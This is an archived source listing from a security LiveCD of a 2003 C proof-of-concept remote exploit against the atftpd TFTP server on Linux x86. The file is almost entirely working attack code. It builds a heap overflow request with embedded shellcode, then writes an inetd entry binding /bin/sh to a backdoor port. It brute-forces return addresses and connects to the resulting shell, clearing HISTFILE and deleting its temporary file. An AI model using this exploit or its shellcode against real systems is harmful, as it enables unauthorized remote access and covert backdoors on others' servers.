home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / ftp / atftpd / atftpdx.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  9.9 KB  |  356 lines
  1. /**
  2.  ** PoC linux/86 remote exploit against atftpd (c) gunzip ( FIXED )
  3.  **
  4.  ** This is a PoC as I didn't investigate the bug very much :
  5.  **
  6.  ** - shellcode is placed in the heap but I didn't check if you can 
  7.  **   increase the number of the nops (probably you can)
  8.  **
  9.  ** - I didn't check other distro/os for offset(s)
  10.  **
  11.  ** - atftpd may crash during attack
  12.  ** 
  13.  ** - There are better shellcodes to use with this (connect back)
  14.  **
  15.  ** - Code sux, better using select() instead of alarm()
  16.  **
  17.  ** However on my machine with atftpd version 0.6 ( from Debian Woody .deb )
  18.  **
  19.  **    [+] Using len=260 align=0 retaddr=0x08055640 shellcode=120 bport=2583
  20.  **    sh: no job control in this shell
  21.  **    sh-2.05b$ uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
  22.  **     Linux gunzip 2.4.20 #2 Thu Mar 13 14:37:10 CET 2003 i686 unknown
  23.  **    sh-2.05b$
  24.  **
  25.  ** Thu Jun  5 20:37:32 CEST 2003
  26.  **
  27.  ** bug found by Rick <rikul@interbee.com>
  28.  ** http://www.securityfocus.com/archive/82/323886/2003-06-02/2003-06-08/0
  29.  **
  30.  ** kisses to tankie
  31.  ** greets: sorbo, arcangelo, jestah
  32.  **
  33. */
  34. #include <stdio.h>
  35. #include <stdlib.h>
  36. #include <unistd.h>
  37. #include <string.h>
  38. #include <netdb.h>
  39. #include <sys/types.h>
  40. #include <sys/socket.h>
  41. #include <netinet/in.h>
  42. #include <arpa/inet.h>
  43. #include <signal.h>
  44.  
  45. #define HEAP_START    0x080514b4
  46. #define HEAP_END    0x080594b4
  47.  
  48. #define BACKDOOR    "rfe"    /* port MUST be > 1024         */
  49. #define NOPNUM        128    /* number of nops        */
  50. #define PORT        69    /* tftpd port            */
  51. #define    BUFSIZE        512    /* size of exploit buffer     */
  52. #define TIMEOUT        0x5    /* timeout in sec.        */
  53. #define NOALARM        0x0    /* no timeout            */
  54. #define    RRQ        0x1    /* request method        */
  55. #define MODE        "octet"    /* request mode            */
  56. #define OFFSET         16000    /* distance of nops from heap    */
  57.  
  58. struct target {
  59.     char * name ;
  60.     unsigned int    align ;
  61.     unsigned int    len ;
  62.     unsigned int    retaddr ;
  63. } tg[] = 
  64.     { 
  65.         { "Linux (Debian 3.0)",    0,    264,     0x0805560c     }, 
  66.           { NULL,            0,     0,     0         }
  67.     };
  68.  
  69. char shellcode[]= /* taken from lsd-pl.net */
  70.     "\xeb\x22"             /* jmp     <cmdshellcode+36>      */
  71.     "\x59"                 /* popl    %ecx                   */
  72.     "\x31\xc0"             /* xorl    %eax,%eax              */
  73.     "\x50"                 /* pushl   %eax                   */
  74.     "\x68""//sh"           /* pushl   $0x68732f2f            */
  75.     "\x68""/bin"           /* pushl   $0x6e69622f            */
  76.     "\x89\xe3"             /* movl    %esp,%ebx              */
  77.     "\x50"                 /* pushl   %eax                   */
  78.     "\x66\x68""-c"         /* pushw   $0x632d                */
  79.     "\x89\xe7"             /* movl    %esp,%edi              */
  80.     "\x50"                 /* pushl   %eax                   */
  81.     "\x51"                 /* pushl   %ecx                   */
  82.     "\x57"                 /* pushl   %edi                   */
  83.     "\x53"                 /* pushl   %ebx                   */
  84.     "\x89\xe1"             /* movl    %esp,%ecx              */
  85.     "\x99"                 /* cdql                           */
  86.     "\xb0\x0b"             /* movb    $0x0b,%al              */
  87.     "\xcd\x80"             /* int     $0x80                  */
  88.     "\xe8\xd9\xff\xff\xff" /* call    <cmdshellcode+2>       */
  89.     "echo " BACKDOOR " stream tcp nowait nobody /bin/sh sh -i>/tmp/.x ;/usr/sbin/inetd /tmp/.x;"
  90. ;
  91.  
  92. void timeout( int sig )  
  93. {
  94.     alarm( NOALARM );
  95.     signal( SIGALRM, SIG_DFL );
  96.     fprintf(stderr,"[-] Timeout.\n");
  97.     exit( EXIT_FAILURE );
  99.  
  100. int shell( int fd )
  101. {
  102.         int rd ;
  103.         fd_set rfds;
  104.         static char buff[ 1024 ];
  105.     char INIT_CMD[] = "unset HISTFILE; rm -f /tmp/.x; echo; id; uname -a\n";
  106.  
  107.         write(fd, INIT_CMD, strlen( INIT_CMD ));
  108.  
  109.         while(1) {
  110.                 FD_ZERO( &rfds );
  111.                 FD_SET(0, &rfds);
  112.                 FD_SET(fd, &rfds);
  113.  
  114.                 if(select(fd+1, &rfds, NULL, NULL, NULL) < 1) {
  115.             perror("[-] Select");
  116.             exit( EXIT_FAILURE );
  117.         }
  118.                 if( FD_ISSET(0, &rfds) ) {
  119.                         if( (rd = read(0, buff, sizeof(buff))) < 1) {
  120.                 perror("[-] Read");
  121.                 exit( EXIT_FAILURE );
  122.             }
  123.                         if( write(fd,buff,rd) != rd) {
  124.                 perror("[-] Write");
  125.                 exit( EXIT_FAILURE );
  126.             }
  127.                 }
  128.                 if( FD_ISSET(fd, &rfds) ) {
  129.                         if( (rd = read(fd, buff, sizeof(buff))) < 1) {
  130.                 exit( EXIT_SUCCESS );
  131.             }
  132.                         write(1, buff, rd);
  133.                 }
  134.         }
  135. }
  136.  
  137. int try( unsigned short bport, unsigned long ip  )
  138. {
  139.         int                     sockfd ;
  140.         struct sockaddr_in      sheep ;
  141.  
  142.         if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) == -1)
  143.     {
  144.                 perror("[-] Socket");
  145.         exit( EXIT_FAILURE );
  146.     }
  147.  
  148.         sheep.sin_family = AF_INET;
  149.         sheep.sin_addr.s_addr = ip ;
  150.         sheep.sin_port = htons ( bport );
  151.  
  152.         signal( SIGALRM, timeout ); 
  153.     alarm( TIMEOUT );
  154.  
  155.         if ( connect(sockfd,(struct sockaddr *)&sheep,sizeof(sheep)) == -1 ) 
  156.     {
  157.         alarm( NOALARM );
  158.         signal(SIGALRM,SIG_DFL);
  159.                 return 0;
  160.     }
  161.  
  162.         alarm( NOALARM ); 
  163.     signal(SIGALRM,SIG_DFL);
  164.  
  165.         return sockfd ;
  166. }
  167.         
  168. char * xp_make_str( unsigned int len, unsigned int align, unsigned long retaddr )
  169. {
  170.     int c ;
  171.     char *     xp = (char *)calloc( BUFSIZE, sizeof(char) );
  172.     char *     code = shellcode ;
  173.  
  174.     if( !xp ) {
  175.                 fprintf(stderr, "[-] Not enough memory !\n");
  176.                 exit( EXIT_FAILURE );
  177.         }
  178.  
  179.     /* stupid check */
  180.  
  181.     if (( align + len ) > (BUFSIZE - strlen( shellcode ) - 32)) {
  182.         fprintf(stderr, "[-] String too long or align too high.\n");
  183.         exit( EXIT_FAILURE );
  184.     }
  185.     /* 
  186.       * our buffer shoud look like this
  187.       *
  188.       * [ NOPS ][ SHELLCODE ][ RETADDR * 4 ][ 0 ][ MODE ][ 0 ][ NOPS ][ SHELLCODE ]
  189.       *                                    |_____> len
  190.     */
  191.     memset ( xp, 0x41, BUFSIZE );
  192.  
  193.     memcpy( xp + len - strlen( code ) - 16, code, strlen( code )); 
  194.  
  195.     for ( c = align + len - 16 ; c < len  ; c += 4 )
  196.         *(long *)( xp + c ) = retaddr ;
  197.  
  198.     *( xp ) = 0x0 ;
  199.     *( xp + 1 ) = RRQ ;
  200.     *( xp + len )= '\0' ;
  201.  
  202.     memcpy( xp + len + 1, MODE, strlen( MODE )); 
  203.  
  204.     *( xp + len + 1 + strlen( MODE )) = '\0' ;
  205.  
  206.     memcpy ( xp + BUFSIZE - strlen( code ), code, strlen( code ));
  207.  
  208.     return xp ;
  210.  
  211. void usage( char * a )
  212. {
  213.     int o = 0 ;
  214.     fprintf(stderr, 
  215.         "__Usage: %s -h host -t target [options]\n\n"
  216.         "-o\toffset\n" 
  217.         "-a\talign\n"
  218.         "-s\tstep for bruteforcing (try 120 <= step <= 512)\n"
  219.         "-l\tlength of filename\n"
  220.         "-v\ttreceives packets too (check if daemon's crashed)\n"
  221.         "-b\tenables bruteforce (dangerous !)\n\n", a);
  222.     while( tg[o].name != NULL )
  223.     {
  224.         fprintf(stderr, "\t%d - %s\n", o, tg[o].name ); o++ ;
  225.     } 
  226.     fprintf( stderr, "\n" );
  227.     exit( EXIT_FAILURE );
  228. }
  229.  
  230. int main(int argc, char *argv[])
  231. {
  232.     int             sfd, t = 0, bport = 0, opt = 0, offset = 0, 
  233.                 want_receive = 0, brute = 0, yeah = 0, step = 0;
  234.         struct     servent     * se ;
  235.     unsigned long        n ;
  236.     char *             host ; 
  237.         struct     sockaddr_in     server ;
  238.     int             len = sizeof(server);
  239.  
  240.         char * rbuf = (char *)calloc( BUFSIZE + 4, sizeof(char) );
  241.         char * wbuf = (char *)calloc( BUFSIZE + 4, sizeof(char) );
  242.  
  243.         if ( !wbuf || !rbuf )  {
  244.                 fprintf(stderr, "[-] Not enough memory !\n");
  245.                 exit( EXIT_FAILURE );
  246.         }
  247.  
  248.     memset(&server, 0, sizeof(server));
  249.  
  250.         fprintf(stderr,"\nlinux/x86 atftpd remote exploit by gunzip\n\n");
  251.  
  252.     if ( argc < 3 ) 
  253.         usage( argv[0] );
  254.  
  255.         while ((opt = getopt(argc, argv, "bvo:a:l:h:t:s:")) != EOF) {
  256.                 switch(opt)
  257.                 {
  258.             case 's': step = atoi( optarg ); break ;
  259.             case 'h': host = strdup ( optarg ); break;
  260.             case 't': t = atoi(optarg); break;
  261.             case 'b': brute++ ; break ;
  262.             case 'v': want_receive++ ; break ;
  263.             case 'o': offset += atoi( optarg ); break;
  264.             case 'a': tg[t].align = atoi( optarg ); break;
  265.             case 'l': tg[t].len = atoi( optarg ); break;
  266.             default: usage( argv[0] ); break;
  267.         }
  268.     }
  269.         if (( se = getservbyname( BACKDOOR, NULL )) == NULL ) {
  270.                 perror("[-] Getservbyname");
  271.         exit( EXIT_FAILURE );
  272.     }
  273.     if ((bport = ntohs( se->s_port )) < 1024 ) {
  274.         fprintf(stderr, "[-] Backdoor port must be <= 1024\n");
  275.         exit( EXIT_FAILURE );
  276.     }
  277.         if ( inet_aton( host , &server.sin_addr) == 0 ) {
  278.             struct hostent * he ;
  279.             
  280.             if ( (he = gethostbyname( host )) == NULL )  {
  281.             perror("[-] Gethostbyname");
  282.             exit( EXIT_FAILURE );
  283.         }
  284.             server.sin_addr.s_addr =
  285.                       ((struct in_addr *)(he->h_addr))->s_addr ;
  286.         }
  287.     if ((sfd = socket(AF_INET, SOCK_DGRAM, 0)) == -1 ) {
  288.         perror("[-] Socket");
  289.         exit( EXIT_FAILURE );
  290.     }
  291.     
  292.     fprintf(stdout,"[+] Sending request to host %s\n",
  293.         inet_ntoa(server.sin_addr));
  294.  
  295.     if ( !step ) step = tg[t].len / 2 ; 
  296.         if ( brute ) offset += OFFSET ;
  297.  
  298.     for( n = HEAP_START + offset; n < HEAP_END ; n += step ) {
  299.     
  300.         fprintf(stdout,"[+] Using len=%d align=%d retaddr=0x%.8x shellcode=%d bport=%d\n",
  301.             tg[t].len, tg[t].align, 
  302.             (brute ) ? (unsigned int)n : (unsigned int)tg[t].retaddr + offset, 
  303.             strlen(shellcode), bport );
  304.  
  305.         if ( !brute )
  306.             wbuf = xp_make_str( tg[t].len, tg[t].align, tg[t].retaddr + offset );
  307.         else
  308.             wbuf = xp_make_str( tg[t].len, tg[t].align, n ); 
  309.  
  310.             server.sin_port = htons( PORT );
  311.  
  312.         if ( sendto(sfd, wbuf,
  313.                    (size_t) BUFSIZE, 0,
  314.                 (struct sockaddr *)&server,
  315.                     (socklen_t)sizeof(struct sockaddr)) < tg[t].len)
  316.         {
  317.             perror("[-] Sendto");
  318.         }
  319.         else if ( want_receive )
  320.         {    
  321.                 signal( SIGALRM, timeout );
  322.                 alarm( TIMEOUT );
  323.  
  324.             if ( recvfrom(sfd, rbuf, 
  325.                 (size_t) BUFSIZE, 0,
  326.                         (struct sockaddr *)&server,
  327.                         (socklen_t *)&len) != -1 )
  328.             {
  329.                             alarm( NOALARM );
  330.                                 signal( SIGALRM, SIG_DFL);
  331.                 fprintf( stdout,"[+] Received: %.2x %.2x %.2x %.2x\n",
  332.                     rbuf[0],rbuf[1],rbuf[2],rbuf[3]);
  333.             }
  334.             else {
  335.                 perror("[-] Recvfrom");
  336.             }
  337.         }
  338.         sleep ( 1 ) ;
  339.  
  340.         if((yeah = try( bport, server.sin_addr.s_addr ))) {
  341.                 shell( yeah );
  342.                 exit( EXIT_SUCCESS );
  343.         }
  344.  
  345.         if ( !brute ) break ;
  346.  
  347.         memset( wbuf, 0, BUFSIZE + 4 );
  348.         memset( rbuf, 0, BUFSIZE + 4 );
  349.     }    
  350.  
  351.     return 1 ;
  352. }
  353.         /* http://members.xoom.it/gunzip/ */    
  354.  
  355.  
  356.